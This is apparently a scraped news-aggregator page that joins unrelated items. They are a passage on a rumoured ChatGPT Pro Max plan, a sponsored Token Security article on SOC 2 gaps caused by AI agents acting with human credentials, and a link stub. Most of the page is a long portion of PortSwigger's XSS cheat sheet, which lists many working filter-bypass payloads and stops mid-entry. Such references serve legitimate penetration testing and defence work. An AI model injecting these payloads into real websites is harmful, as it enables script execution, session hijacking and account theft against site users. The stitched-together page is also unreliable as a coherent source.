I also noticed that ChatGPT's new plan teases access to the company's most capable frontier models, maximum memory, 100GB of file storage, and early access to new features.

It is worth noting that the $200 plan also promises early access, so we are not sure if that capability is going away and becoming exclusive to the $500 plan.

OpenAI has not announced Pro Max, so we don't know its exact usage limits yet. It could also offer substantially higher allowances than the existing Pro plans.

ChatGPT Pro Max could use Cerebras for faster AI

There's another interesting possibility behind the "Fastest Work and Codex" wording, and the guess is that it could use Cerebras.

For those unaware, OpenAI has been deploying more Cerebras hardware for ultra-fast AI inference , but we haven't seen anything recently from the company on that front.

The most recent development was from early this year, when Codex-Spark launched on Cerebras at more than 1,000 tokens per second, and OpenAI later demonstrated GPT-5.6 Sol running at up to 750 output tokens per second in its Cerebras-powered Ultrafast mode.

It is entirely possible that Cerebras is a likely candidate for powering at least some of Pro Max's faster Work and Codex experience, although neither OpenAI nor Cerebras has confirmed that connection.

Right now, ChatGPT offers Pro tiers at $100 and $200 per month, but new sign-ups and upgrades to the ChatGPT Pro $200 plan have been temporarily paused since September 10.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

With the Rise of AI Agents, SOC 2 Should Adapt or Risk Irrelevance

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 10:51:10
AI agents can operate through human credentials and take actions that existing SOC 2 controls may not distinguish from human activity. Token Security explains why SOC 2 needs to adapt to address the security gaps created by agent identities. [...]...
Original Article

People in doorways

Some compliance is mostly for show, and that’s being charitable. You go through it for the website badge, not to find weak spots in your organization. SOC 2 is not like that.

There’s a reason your customers’ procurement teams demand it. They want to know whether they can trust you with their data, and SOC 2 compliance is the accepted way to demonstrate that. It might not be the reason a deal closes, but that deal wouldn’t have closed without it.

We’ve lived “move fast and break things” for so long that we assume disruption must mean breaking stuff by definition. Only when it comes to AI agents, it’s not so easy because of the way they use the existing infrastructure .

Consider an access review row. A production database, 10:03 am, 50 queries under the name of a senior engineer. You were right to approve it; everything conforms accurately to the control. Only that engineer was getting coffee at the time, while their agent was pushing updates to production.

SOC 2’s technology-neutral criteria can cover AI agents, but they do not explicitly require organizations or auditors to treat agents as a distinct identity class. That discretion allows AI agents to add risk to an environment without failing a single control.

If SOC 2 lets you get away with this, the framework either needs to change or risk becoming outdated.

What’s Happening

During an audit, you’re tested on two things: whether the control meets a compliance criterion, and whether it operated throughout the review period. But what about testing whether the design is still relevant?

Sometimes, when there’s a shift, a test gets harder. But often, it just gets emptier, because the activity happens elsewhere, which brings us to the Trust Services Criteria in SOC 2 . It’s not that they’re wrong, but four of the common assumptions no longer hold, and as a result, three controls are hollowing out.

The assumptions are:

  • Someone approves an account before it’s spawned.
  • Every account has a known owner.
  • The name in the log pinpoints the actor.
  • What an account can do tells you what it’s expected to do.

Four assumptions that no longer hold (CC6.1–CC6.3)

Every access criterion is based on assumptions about what it controls. And as long as the actors were human, those assumptions were safe enough that nobody needed to write them. With agents, this is no longer the case.

1. Someone approves an account before it’s spawned.

SOC 2 requires you to register and approve a user before granting login capabilities. For humans, that means someone asking for a login, with someone else approving and logging it. Agents, on the other hand, are akin to a side effect of an overarching action.

It can be a developer clicking “Allow” on an OAuth screen, an API key that’s pasted into a config file, or an MCP server added to a JSON file . No one was asked to approve the creation of an agent; it just happened.

2. Every account has a known owner.

In access review procedures, a named human confirms that the reviewed account should still have access.  For agents, it’s common not to have a named owner. You need to piece that together after the fact, from circumstantial evidence and conjecture, by examining the agent's artifacts associated with humans, such as keys and repos.

At scale, agent ownership is an educated guess rather than a deterministic record. SOC 2 doesn’t account for this: a guessed owner and a recorded owner look the same in a review spreadsheet.

3. The name in the log pinpoints the actor.

This is the expensive one, which we already mentioned in our 10:03 am example. Often, agents work with borrowed credentials: a logged-in session, a dev token, or a service account. That’s the person who will appear in your logs and in your access review. This will pass the review, while absolutely ignoring the security differences between people and agents.

On the one hand, the access review will be completely accurate. On the other hand, it won’t tell you what you actually need to know. A recent study with Cloud Security Alliance found more than two-thirds of organizations cannot clearly distinguish AI agent actions from human ones.

4. What an account can do tells you what it’s expected to do.

Least privilege operates under the assumption that an account has a permanent job, and the list of things it can do tells us what it’s for. And for people, that’s usually correct. Unless your CEO wants to be an admin everywhere, access levels are tailored to the job.

For agents, the access limits the blast radius, but it doesn’t tell you what the agent is expected to do at any given moment. That depends on the instructions received, the context absorbed, and the decisions the agent makes. So, checking permissions gives you the widest possible view of what can happen without providing context for the agent’s actions.

Beyond The Checkbox

Your SOC 2 report says the controls worked, but it never says what they missed. Agents run on borrowed credentials, with no owner and no off switch.

Token Security finds every agent, assigns an identity, and remediates its access to the job it was made to do.

Find your agents

Three controls that pass without covering anything

Here’s how the assumptions we’ve mentioned reduce the effectiveness of three SOC 2 controls.

Nothing ever says an agent should stop (CC6.3)

Every SOC 2 audit tests offboarding, and for human employees, companies have gotten very good at it. HR systems, IdP, and SaaS systems work in tandem when the HR department flags a person for offboarding, thereby exercising its unquestionable authority. Even the evidence writes itself.

There aren’t any HR systems for agents. There’s no centralized, agreed-upon body that’s in the position to say a specific agent should stop. It’s not a broken control, but one that just doesn’t encompass agents and the identities they use.

What makes it worse is that agents are mostly tied to humans, so when a person leaves, the agents set up in their name might keep running using OAuth grants or API keys, unless this scenario is accounted for.

Vendor review starts at purchase (CC9.2)

SOC 2 manages processes relating to vendor relationships. You contract, assess, collect a report, and review it annually; it works well for vendors who arrive on a purchase order. An MCP server is a vendor in every way that matters: it receives your data, acts on your behalf, and runs code nobody in the company reads.

Instead of a purchase order and a data agreement, it arrives in a config file. Often, there’s no company at the other end at all.

About three in ten names in our registry cannot be matched to an existing company. That’s a naming-space figure, not a specific environment, but it points to a fundamental compliance issue for many MCPs: you can’t receive a SOC 2 report from an unnamed vendor.

The same problem appears for AI agents. When we find them on employee machines, only some are safe to block; the rest are held back because the program's name can collide with something the customer built. Identifying an agent is harder than identifying a person. If you’re ready to explore the AI Agent Security controls, book a demo with Token Security to see what’s hiding in your environment.

Segregation of duties between two instances of the same policy (CC8.1)

When implementing change management, changes should be authorized, tested, approved, and implemented. In most implementations, the author and the approver must be different people due to segregation of duties.

When an agent makes a change and a second agent reviews it, the separation is only nominal, even though two identities were involved.

Meanwhile, the authorization moved beyond the scope of the audit. The decision about the change can happen in a prompt, in a tool that appears nowhere in the system description. The only evidence is a pull request.

The strongest argument against all of this

It’s worth noting that nothing in the Trust Services Criteria says “human”. CC6.2 uses “internal and external users,” whereas CC6.1 uses “protected information assets.” The criteria were written to avoid naming technologies and to describe results rather than methods. So there’s no reason not to cover agents.

You treat machine accounts as users, list agents in the system descriptions, and test them properly. It’s a thing that happens in the real world.

That said, given the current level of disruption, the ambiguity might not be enough. With no specific mentions of agents in the criteria, what gets covered is agreed between you and your auditor.

Both of you have a reason to prefer a scope that’s easy to evidence. As long as you can leave agents out without recording a single exception, some people will do it.

What a clean report has never meant

A clean report means your controls behaved the way you said they would, not that the description was complete. The gap used to be small enough to ignore, but it is no longer.

It is now entirely possible to hold an unqualified Type 2 report and be unable to answer, on the day it is issued, four questions about your own production environment.

Question

The control that covers it

Why it’ll pass

What is running in there?

User registration and authorization (CC6.2)

The agent was never registered, so nothing looked missing

Who authorized it?

Change authorization (CC8.1)

The decision happened in a prompt, upstream of the evidence

Whose credentials are they carrying?

Access review (CC6.1)

A real employee's credentials, with an approved role

Who could switch it off?

Access removal (CC6.3)

Offboarding ran correctly and never flagged agents

SOC 2 is not wrong. It is accurate about a world that moved. So treat machine accounts as users, and go further than the report asks. The permission list can tell you what an agent can reach; it does not tell you what an agent is there to do.

Closing this gap is what we mean by intent-based security: you establish what each agent is meant to do, then you make its access match. Identity is the layer where that control actually holds because it spans every system the agent touches.

The report will not change, but these controls are there for a reason, and attackers don’t care about checklists.

Every environment has an access review line that looks approved but says nothing. Token Security shows you the agent behind it: who owns it, whose credentials it uses, and whether what it can reach still aligns with what it's there to do.

Book a demo and we'll walk your environment together.

Sponsored and written by Token Security .

I Was Not Blown Away by Eli Tan’s ‘I Was Blown Away’ Review of Meta Muse

Daring Fireball
www.nytimes.com
2026-09-25 10:41:29
Eli Tan, writing for The New York Times, “I Gave My Life Over to Meta’s A.I. Agent and Was Blown Away” (gift link): For one final task, I asked Wren for a good way to spend that $44.99 it had saved me. At this point, it knew my life pretty well. I thought it might suggest something altruistic, l...
Original Article

Please enable JS and disable any ad blocker

Cross-Site Scripting (XSS) Cheat Sheet

Lobsters
portswigger.net
2026-09-25 10:30:37
Comments...
Original Article

Works in Chrome Works in Firefox Works in Safari

No parentheses using exception handling

<script>onerror=alert;throw 1</script>

Works in Chrome Works in Firefox Works in Safari

No parentheses using exception handling no semi colons

<script>{onerror=alert}throw 1</script>

Works in Chrome Works in Firefox Works in Safari

No parentheses using exception handling no semi colons using expressions

<script>throw onerror=alert,1</script>

Works in Chrome

No parentheses using exception handling and string eval on Chrome / Edge

<script>throw onerror=eval,'=alert\x281\x29'</script>

Works in Safari

No parentheses using exception handling and string eval on Safari

<script>throw onerror=eval,'alert\x281\x29'</script>

Works in Firefox

Works in Firefox Works in Safari

No parentheses using exception handling and object eval on Firefox / Safari

<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

No parentheses, no quotes, no spaces, no curly brackets using exception handling and location hash eval on all browsers

<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>

Works in Chrome Works in Firefox Works in Safari

No parentheses using ES6 hasInstance and instanceof with eval

<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

Works in Chrome Works in Firefox Works in Safari

No parentheses using ES6 hasInstance and instanceof with eval without .

<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

No parentheses using template strings

<script>alert`1`</script>

Works in Chrome Works in Firefox Works in Safari

No parentheses using template strings and location hash

<script>new Function`X${document.location.hash.substr`1`}`</script>

Works in Chrome Works in Firefox Works in Safari

No parentheses or spaces, using template strings and location hash

<script>Function`X${document.location.hash.substr`1`}```</script>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

XSS without greater than

<svg onload=alert(1)

Works in Chrome Works in Firefox Works in Safari

XSS without greater using a HTML comment

<svg onload=alert(1)<!--

Works in Chrome Works in Firefox Works in Safari

Array based destructuring using onerror

<script>throw[onerror]=[alert],1</script>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Destructuring using default values and onerror

<script>var{haha:onerror=alert}=0;throw 1</script>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using object literal

<script>window.name='javascript:alert(1)';function blah(){} blah(""+{a:location=name}+"")</script>

Works in Chrome Works in Firefox Works in Safari

Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using new class

<script>window.name='javascript:alert(1)';function blah(){} blah(""+new class b{toString=e=>location=name}+"")</script>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Script tag using only uppercase using JSFuck and inline

<SCRIPT>[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])</SCRIPT>

Works in Chrome

window.name with onerror and throw

<script>throw onerror=eval,name</script>

Works in Chrome

Works in Chrome

SVG with onerror, throw and document.URL

<svg onload="throw top.onerror=eval,'/*'+URL">

Works in Chrome

Works in Chrome

Works in Chrome

Works in Chrome

Works in Chrome

Works in Chrome

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Works in Safari

Works in Safari

onerror and new operator on window name

<script>onerror=eval,new name</script>

Works in Firefox Works in Safari

Works in Chrome

Works in Chrome Works in Firefox Works in Safari

Redefining onerror and concealing the payload in attributes

<img src onerror=src=1,attributes[1].value=alt+id alt=ale id=rt&lpar;1&rpar;>

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

Attributes and SVG and onload event with payload concealed in URL and template strings

<svg onload="attributes[0].value=id+URL+id,new onload" id=`>

Works in Chrome Works in Firefox Works in Safari

Attributes and input with onfocus event with payload concealed in URL and template strings

<input onfocus="attributes[0].value=id+URL+id,new onfocus" id=` autofocus>

Works in Chrome Works in Firefox Works in Safari

Attributes and input with onclick event with payload concealed in URL and template strings requires two clicks

<input onclick=attributes[0].value='`'+URL+'`'>

Works in Chrome Works in Firefox Works in Safari

Form action and input with payload concealed in window name

<form><input onclick="formAction=top.name,type='submit',new submit">

Works in Chrome Works in Safari

SVG and innerHTML to decode the URL then assign it with textContent payload concealed in URL

<svg onload=innerHTML=URL,innerHTML=textContent>

Works in Chrome Works in Firefox Works in Safari

img and innerHTML to decode the URL then assign it with textContent payload concealed in URL

<img/src/onerror=innerHTML=URL,innerHTML=textContent>

Works in Chrome Works in Firefox Works in Safari

innerHTML to decode the URL then eval it using textContent payload concealed in URL

<svg onload=innerHTML=URL,eval(textContent)>

Works in Chrome Works in Firefox Works in Safari

innerHTML and outerHTML to avoid use of greater than

<svg onload=outerHTML=id id=<img/src/onerror=alert(1)&gt;

Works in Chrome Works in Firefox Works in Safari

U+2028 separator (js_comment)

alert(1)

Works in Chrome Works in Firefox Works in Safari

U+2029 separator (js_comment)

alert(1)

Works in Chrome Works in Firefox Works in Safari

prompt() (js_string_single)

'-prompt(1)-'

Works in Chrome Works in Firefox Works in Safari

confirm() (js_string_single)

'-confirm(1)-'

Works in Chrome Works in Firefox Works in Safari

window[] access (js_string_single)

'-window['a'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

template-literal `a` string + window[] access (js_string_single)

'-window[`a`+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

\u0061 escape (js_string_single)

'-\u0061lert(1)-'

Works in Chrome Works in Firefox Works in Safari

\u{0061} escape (js_string_single)

'-\u{0061}lert(1)-'

Works in Chrome Works in Firefox Works in Safari

\u{61} escape (js_string_single)

'-\u{61}lert(1)-'

Works in Chrome Works in Firefox Works in Safari

\u{00000000000061} escape (js_string_single)

'-\u{00000000000061}lert(1)-'

Works in Chrome Works in Firefox Works in Safari

self[] access (js_string_single)

'-self['a'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

template-literal `a` string + self[] access (js_string_single)

'-self[`${`a`}lert`](1)-'

Works in Chrome Works in Firefox Works in Safari

\a literal in string + self[] access (js_string_single)

'-self['\a'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

\x61 escape + self[] access (js_string_single)

'-self['\x61'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

\141 octal escape + self[] access (js_string_single)

'-self['\141'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

/a/.source + self[] access (js_string_single)

'-self[/a/.source+/lert/.source](1)-'

Works in Chrome Works in Firefox Works in Safari

atob.name[0] + self[] access (js_string_single)

'-self[atob.name[0]+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

atob.name[0] + self[] access (js_string_single) #2

'-self[atob.name[0]+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

String.fromCharCode(0x61) + self[] access (js_string_single)

'-self[String.fromCharCode(0x61)+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

String.fromCodePoint(0x61) + self[] access (js_string_single)

'-self[String.fromCodePoint(0x61)+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

10..toString(17) + self[] access (js_string_single)

'-self[10..toString(17)+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

10n.toString(17) + self[] access (js_string_single)

'-self[10n.toString(17)+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

0xa.toString(17) + self[] access (js_string_single)

'-self[0xa.toString(17)+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

0b1010.toString(17) + self[] access (js_string_single)

'-self[0b1010.toString(17)+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

0o12.toString(17) + self[] access (js_string_single)

'-self[0o12.toString(17)+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

atob('YQ==') + self[] access (js_string_single)

'-self[atob('YQ==')+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

unescape('%61') + self[] access (js_string_single)

'-self[unescape('%61')+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

decodeURI('%61') + self[] access (js_string_single)

'-self[decodeURI('%61')+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

decodeURIComponent('%61') + self[] access (js_string_single)

'-self[decodeURIComponent('%61')+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

+[] coercion + self[] access (js_string_single)

'-self['a'+[]+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

frames[] access (js_string_single)

'-frames['a'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

globalThis[] access (js_string_single)

'-globalThis['a'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

top[] access (js_string_single)

'-top['a'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

parent[] access (js_string_single)

'-parent['a'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

this[] access (js_string_single)

'-this['a'+'lert'](1)-'

Works in Chrome Works in Firefox Works in Safari

alert`...` template (js_string_single)

'-alert`1`-'

Works in Chrome Works in Firefox Works in Safari

; separator + throw onerror=alert (js_string_single)

';throw onerror=alert,1;'

Works in Chrome Works in Firefox Works in Safari

LF separator + throw onerror=alert (js_string_single)

' throw onerror=alert,1 '

Works in Chrome Works in Firefox Works in Safari

U+2028 separator + throw onerror=alert (js_string_single)

'
throw onerror=alert,1
'

Works in Chrome Works in Firefox Works in Safari

U+2029 separator + throw onerror=alert (js_string_single)

'
throw onerror=alert,1
'

Works in Chrome Works in Firefox Works in Safari

location=name (js_string_single)

'-[location=name]-'

Works in Chrome Works in Firefox Works in Safari

location.href=name (js_string_single)

'-[location.href=name]-'

Works in Chrome Works in Firefox Works in Safari

location=javascript: %XX paren (js_string_single)

'-[location='javascript:alert%281%29']-'

Works in Chrome Works in Firefox Works in Safari

location=javascript: \xNN paren (js_string_single)

'-[location='javascript:alert\x281\x29']-'

Works in Chrome Works in Firefox Works in Safari

location=javascript: \u paren + \u0028 escape (js_string_single)

'-[location='javascript:alert\u00281\u0029']-'

Works in Chrome Works in Firefox Works in Safari

location=javascript: octal paren (js_string_single)

'-[location='javascript:alert\501\51']-'

Works in Chrome Works in Firefox Works in Safari

Works in Chrome Works in Firefox Works in Safari

alternative JS syntax (event_handler_js_string_single)

'-alert(1)-'

Works in Chrome Works in Firefox Works in Safari

&apos; entity quote (event_handler_js_string_single)

&apos;-alert(1)-&apos;

Works in Chrome Works in Firefox Works in Safari

&#x27; entity quote (with ;) (event_handler_js_string_single)

&#x27;-alert(1)-&#x27;

Works in Chrome Works in Firefox Works in Safari

&#39; entity quote (with ;) (event_handler_js_string_single)

&#39;-alert(1)-&#39;

Works in Chrome Works in Firefox Works in Safari

&#x27 entity quote (no ;) (event_handler_js_string_single)

&#x27-alert(1)-&#x27

Works in Chrome Works in Firefox Works in Safari

&#39 entity quote (no ;) (event_handler_js_string_single)

&#39-alert(1)-&#39

Works in Chrome Works in Firefox Works in Safari

javascript: URL (attribute_href)

javaScript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via raw newline (inline) (attribute_href)

java script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via raw tab (inline) (attribute_href)

java script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &colon; entity (attribute_href)

javascript&colon;alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#58; entity (inline, with ;) (attribute_href)

javascript&#58;alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#58 entity in JS + &#58; entity (inline, no ;) (attribute_href)

javascript&#58alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x3a; entity (inline, with ;) (attribute_href)

javascript&#x3a;alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x3a; entity (inline, no ;) (attribute_href)

javascript&#x3a-alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &NewLine; entity (inline) (attribute_href)

java&NewLine;script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &Tab; entity (inline) (attribute_href)

java&Tab;script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x9; entity (inline, with ;) (attribute_href)

java&#x9;script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x00000000000009; entity (inline, with ;) (attribute_href)

java&#x00000000000009;script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#9; entity (inline, with ;) (attribute_href)

java&#9;script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#00000000000009; entity (inline, with ;) (attribute_href)

java&#00000000000009;script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x9; entity (inline, no ;) (attribute_href)

java&#x9script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#x00000000000009; entity (inline, no ;) (attribute_href)

java&#x00000000000009script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#9; entity (inline, no ;) (attribute_href)

java&#9script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#00000000000009; entity (inline, no ;) (attribute_href)

java&#00000000000009script:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &NewLine; entity (prefix) (attribute_href)

&NewLine;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &Tab; entity (prefix) (attribute_href)

&Tab;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via raw newline (prefix) (attribute_href)

javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via %09 tab prefix (attribute_href)

%09javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via space prefix (attribute_href)

%20javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#1; entity (prefix, with ;) (attribute_href)

&#1;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#2; entity (prefix, with ;) (attribute_href)

&#2;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#3; entity (prefix, with ;) (attribute_href)

&#3;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#4; entity (prefix, with ;) (attribute_href)

&#4;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#5; entity (prefix, with ;) (attribute_href)

&#5;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#6; entity (prefix, with ;) (attribute_href)

&#6;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#7; entity (prefix, with ;) (attribute_href)

&#7;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#8; entity (prefix, with ;) (attribute_href)

&#8;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#9; entity (prefix, with ;) (attribute_href)

&#9;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#10; entity (prefix, with ;) (attribute_href)

&#10;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#11; entity (prefix, with ;) (attribute_href)

&#11;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#12; entity (prefix, with ;) (attribute_href)

&#12;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#13; entity (prefix, with ;) (attribute_href)

&#13;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#14; entity (prefix, with ;) (attribute_href)

&#14;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#15; entity (prefix, with ;) (attribute_href)

&#15;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#16; entity (prefix, with ;) (attribute_href)

&#16;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#17; entity (prefix, with ;) (attribute_href)

&#17;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#18; entity (prefix, with ;) (attribute_href)

&#18;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#19; entity (prefix, with ;) (attribute_href)

&#19;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#20; entity (prefix, with ;) (attribute_href)

&#20;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#21; entity (prefix, with ;) (attribute_href)

&#21;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#22; entity (prefix, with ;) (attribute_href)

&#22;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#23; entity (prefix, with ;) (attribute_href)

&#23;javascript:alert(1)

Works in Chrome Works in Firefox Works in Safari

javascript: URL via &#24; entity (prefix, with ;) (attribute_href)

